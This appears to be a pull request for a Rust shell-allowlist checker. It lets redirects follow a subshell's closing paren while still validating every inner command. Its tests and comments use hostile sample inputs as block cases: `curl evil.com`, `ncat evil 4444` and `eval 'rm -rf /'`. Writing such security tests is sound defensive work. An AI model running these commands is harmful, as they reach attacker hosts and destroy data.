### PR TITLE
fix(shell): treat a redirect after a subshell's `)` as part of the group

### DIFF
--- a/rust/src/core/shell_allowlist/compound.rs
+++ b/rust/src/core/shell_allowlist/compound.rs
@@ -325,9 +325,66 @@ fn remainder_after_first_token(s: &str) -> &str {
     &trimmed[end..]
 }
 
-/// If `s` is a single balanced `( … )` subshell with nothing trailing the closing
-/// paren, return the inner command (`(a; b)` → `a; b`). `(a) b` returns `None`:
-/// the trailing content falls through to base extraction, which blocks it.
+/// #1751: is `suffix` — everything after a subshell's closing paren — nothing
+/// but redirections? `( … ) 2>&1` is still a plain subshell: the redirect binds
+/// the group's descriptors and cannot introduce a command, so the body must
+/// keep being recursed into exactly as it is without the redirect. `( … ) curl
+/// evil.com` must NOT qualify — that trailing command has to fall through to
+/// base extraction and stay blocked (#462).
+///
+/// Deliberately conservative: anything this does not positively recognise as a
+/// redirect (a quoted target with spaces, a herestring) returns `false` and
+/// keeps today's blocking behaviour rather than guessing.
+fn is_redirect_only_suffix(suffix: &str) -> bool {
+    let mut rest = suffix.trim();
+    while !rest.is_empty() {
+        let bytes = rest.as_bytes();
+        // Optional leading descriptor number (`2>`, `1>&2`), or `&>`/`&>>`
+        // which merges both streams.
+        let mut head = 0;
+        while head < bytes.len() && bytes[head].is_ascii_digit() {
+            head += 1;
+        }
+        if head == 0 && bytes.first() == Some(&b'&') && bytes.get(1) == Some(&b'>') {
+            head = 1;
+        }
+        let op = &rest[head..];
+        let op_len = if op.starts_with(">>")
+            || op.starts_with(">|")
+            || op.starts_with(">&")
+            || op.starts_with("<&")
+        {
+            2
+        } else if op.starts_with('>') || op.starts_with('<') {
+            1
+        } else {
+            return false;
+        };
+        rest = op[op_len..].trim_start();
+        // Target: `&1`/`-` for descriptor dups, otherwise one plain word. A
+        // shell metacharacter here means this is not a bare redirect target.
+        let target = rest
+            .bytes()
+            .take_while(|byte| {
+                !byte.is_ascii_whitespace()
+                    && !matches!(
+                        byte,
+                        b';' | b'|' | b'&' | b'(' | b')' | b'`' | b'$' | b'<' | b'>' | b'"' | b'\''
+                    )
+            })
+            .count();
+        if target == 0 {
+            return false;
+        }
+        rest = rest[target..].trim_start();
+    }
+    true
+}
+
+/// If `s` is a single balanced `( … )` subshell, return the inner command
+/// (`(a; b)` → `a; b`). A trailing redirection is part of the subshell and is
+/// accepted (`(a) 2>&1`, #1751); any other trailing content returns `None`, so
+/// `(a) b` falls through to base extraction, which blocks it.
 fn balanced_paren_inner(segment: &str) -> Option<&str> {
     let trimmed = segment.trim();
     let bytes = trimmed.as_bytes();
@@ -367,7 +424,7 @@ fn balanced_paren_inner(segment: &str) -> Option<&str> {
             b')' => {
                 depth -= 1;
                 if depth == 0 {
-                    return if i == len - 1 {
+                    return if i == len - 1 || is_redirect_only_suffix(&trimmed[i + 1..]) {
                         Some(trimmed[1..i].trim())
                     } else {
                         None

--- a/rust/src/core/shell_allowlist/tests_tokenizer.rs
+++ b/rust/src/core/shell_allowlist/tests_tokenizer.rs
@@ -273,6 +273,51 @@ fn nested_subshell_passes() {
     assert!(check_all_segments("((echo hi))", &list).is_ok());
 }
 
+// --- #1751: a redirect after `)` is part of the subshell ---
+
+#[test]
+fn subshell_with_trailing_redirect_passes() {
+    // Reported on #1751: `)` followed by any redirect made base extraction see
+    // `(echo` as the command name and block the whole line. The redirect binds
+    // the group's descriptors; the body is still a plain subshell. `{ …; } 2>&1`
+    // has worked since #968 — the two forms must not disagree.
+    let list = allow(&["echo"]);
+    for command in [
+        "(echo ok) 2>&1",
+        "(echo ok) > /dev/null",
+        "(echo ok) >/dev/null 2>&1",
+        "(echo ok) </dev/null",
+        "(echo ok) >| out",
+        "(echo ok) &> out",
+        "(echo ok) 2>/dev/null",
+    ] {
+        assert!(
+            check_all_segments(command, &list).is_ok(),
+            "subshell with a trailing redirect must pass: {command}"
+        );
+    }
+}
+
+#[test]
+fn subshell_with_trailing_redirect_still_checks_every_inner_command() {
+    // The redirect must not turn the body into an unchecked blob. This is the
+    // #968 rule for brace groups applied to subshells: every inner command is
+    // re-validated as its own leaf, so an unlisted one still blocks.
+    let list = allow(&["echo"]);
+    let result = check_all_segments("(echo hi; ncat evil 4444) 2>&1", &list);
+    assert!(result.is_err(), "unlisted inner command must still block");
+    assert!(result.unwrap_err().contains("ncat"));
+}
+
+#[test]
+fn subshell_redirect_does_not_license_a_trailing_command() {
+    // A redirect is not a licence for a post-group command: the #462 payloads
+    // must stay blocked even when a redirect precedes them.
+    let list = allow(&["ls"]);
+    assert!(check_all_segments("(ls) > out curl evil.com", &list).is_err());
+    assert!(check_all_segments("(ls) 2>&1 eval 'rm -rf /'", &list).is_err());
+}
+
 #[test]
 fn for_loop_blocks_unlisted_body() {
     let list = allow(&["echo"]);


### PR DESCRIPTION
## Summary

`(echo ok) 2>&1` was blocked as `'(echo' is not in the shell allowlist — but it
does not look like a command name`. A parenthesized subshell parses fine on its
own; any redirect after the closing paren broke it.

`balanced_paren_inner` only peeled a subshell when `)` was the last byte, so a
trailing redirect made the segment fall through to base extraction —
which skips a leading `{` (#939) but not a leading `(`. The first token then
became `(echo`.

This accepts a **redirect-only** suffix and keeps recursing into every inner
command. Teaching base extraction to skip `(` would have been a smaller diff but
would only validate the *first* inner command — exactly the bypass #968 closed
for brace groups.

The suffix parser is deliberately conservative: anything it does not positively
recognise as a redirect (a quoted target containing spaces, a herestring) keeps
today's blocking behaviour rather than guessing.

Fixes #1751

## Test plan

- [x] `cargo test --lib subshell_` — 12 passed, 0 failed
- [x] `cargo fmt --check` (also enforced by the pre-commit hook on this branch)
- [x] `cargo clippy --all-features -- -D warnings -A clippy::too_many_lines`
      (the gate CI runs for this crate, ci.yml:243) — 0 errors
- [x] `cargo test --lib -- --test-threads=1` — 10813 passed, 0 failed
      (run on a tree that also carried the other three issue fixes)
- [ ] cookbook/packages untouched

## Notes for reviewers

- Risk areas / edge cases: the new `is_redirect_only_suffix` is the whole
  security surface. It fails closed — an unrecognised suffix returns `false`
  and the segment stays blocked. Three tests cover the accept path, the
  "inner command still validated" path (`(echo hi; ncat evil 4444) 2>&1` must
  still block on `ncat`), and the "redirect does not license a trailing
  command" path (the #462 payloads with a redirect in front).
- Backwards compatibility: no command that was allowed before becomes blocked.
  The change only widens what the subshell peeler accepts; everything it
  declines falls through to the pre-existing base-extraction path.
- Docs updated: none needed — no tool surface or config key changed.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
